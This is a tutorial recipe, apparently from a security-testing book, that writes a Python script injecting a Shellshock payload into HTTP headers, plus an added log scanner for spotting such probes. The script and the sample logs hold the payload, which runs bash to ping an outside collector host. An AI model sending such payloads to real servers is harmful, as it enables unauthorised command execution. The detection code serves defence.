Shellshock checking

Moving away from the standard style of attacks against web servers, we're going to quickly look at Shellshock, a vulnerability that allowed attackers to run shell commands through specific HTTP headers. This vulnerability reared its head in 2014 and gained momentum quickly as one of the biggest vulnerabilities of the year. While it has now been mostly patched, it's a good example of how web servers can be manipulated to perform more complex attacks, and it is likely to be a frequent target in capture the flag (CTF) events for years to come.

We will create a script that pulls down the headers of a page, identifies whether the vulnerable headers are present, and submits an example payload to that header. This script relies on external infrastructure supporting this attack to collect compromised device call-outs.

Getting ready

Identify the URL you wish to test. Once you've identified your target web page, pass it to the script as a command-line argument, which the script reads from sys.argv.

How to do it…

Your script should be the same as the following script:

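import requests
import sys

# Target URL is taken from the first command-line argument
url = sys.argv[1]
# Shellshock test string; <url/ip> is the server that collects the call-out
payload = "() { :; }; /bin/bash -c 'ping -c 1 -p pwnt <url/ip>'"
headers = {}
# Pull down the page's headers with a HEAD request
r = requests.head(url)
for header in r.headers:
  # Set the payload against the headers this recipe tests
  if header == "referer" or header == "User-Agent":
    headers[header] = payload
# Submit the request with the prepared headers
req = requests.post(url, headers=headers)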

The script won't provide output as it targets the admin side of functionality. However, you could easily set it to provide an output on each loop with:

print("Submitted " + payload)

This would return the following every time:

Submitted () { :; }; /bin/bash -c 'ping -c 1 -p pwnt <url/ip>'

How it works…

We import the libraries that we require for this script and take the target URL as input from sys.argv. This is getting a bit repetitive, but it gets the job done.

We declare our payload as a singular entity. If you have multiple actions that you wish to perform upon the server, you can make this a payload, similar to the preceding. We also create an empty dictionary for our header-payload combinations and make a HEAD request to the target URL:

payload = "() { :; }; /bin/bash -c 'ping -c 1 -p pwnt <url/ip>'"
headers = {}
r = requests.head(url)

The payload set here will ping whichever server you set in the <url/ip> placeholder. It will send a message in that ping, which is pwnt. This allows you to identify that the server has actually been compromised and that the ping is not just from a random server.

We then go through each header we pulled in the initial HEAD request and check to see if any are the Referer or User-Agent headers, which are the headers vulnerable to the Shellshock attack. If those headers are present, we set our attack string against that header:

for header in r.headers:
  if header == "referer" or header == "User-Agent":
    headers[header] = payload

Once we've established whether our headers are present and set the attack string against them, we launch our request. If successful, the message should appear in our logs:

req = requests.post(url, headers=headers)
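
On the receiving web server, the same header values end up in the access log, which is where a defender can spot this check being run. The following is an added example, not part of the original recipe: it scans combined-format access log lines for the "() {" function-definition trigger in the Referer and User-Agent fields. The function name, log lines, request paths and addresses are constructed for illustration.

```python
import re

# Apache/nginx "combined" log format: the last two quoted fields are the
# Referer and User-Agent request headers, the two this recipe injects into.
COMBINED = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<user_agent>(?:[^"\\]|\\.)*)"$'
)

# A header value that starts with a bash function definition, "() {", is the
# Shellshock trigger. Whitespace is matched loosely so near-miss probes are
# flagged as well.
SHELLSHOCK = re.compile(r'\s*\(\s*\)\s*\{')

def find_shellshock_probes(log_lines):
    """Return (client, header, value) for each header carrying the trigger."""
    hits = []
    for line in log_lines:
        m = COMBINED.match(line.strip())
        if not m:
            continue  # not combined format; skip rather than guess
        for field, name in (("referer", "Referer"), ("user_agent", "User-Agent")):
            value = m.group(field)
            if SHELLSHOCK.match(value):
                hits.append((m.group("client"), name, value))
    return hits

# Constructed sample lines (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Oct/2014:13:55:36 +0000] "GET /index.html HTTP/1.1" '
    '200 2326 "http://example.com/" "Mozilla/5.0 (X11; Linux x86_64)"',
    '192.0.2.44 - - [10/Oct/2014:13:56:02 +0000] "POST /cgi-bin/status HTTP/1.1" '
    '200 0 "-" "() { :; }; /bin/bash -c \'ping -c 1 -p pwnt 198.51.100.7\'"',
    '192.0.2.45 - - [10/Oct/2014:13:57:11 +0000] "HEAD / HTTP/1.1" '
    '200 0 "() { :;}; ping -c 1 198.51.100.7" "curl/7.38.0"',
]

if __name__ == "__main__":
    for client, header, value in find_shellshock_probes(SAMPLE_LOG):
        print(f"{client} {header}: {value}")
```

A hit shows only that the string was submitted, not that the server executed it; patch level and outbound traffic to the address in the payload are the follow-up checks.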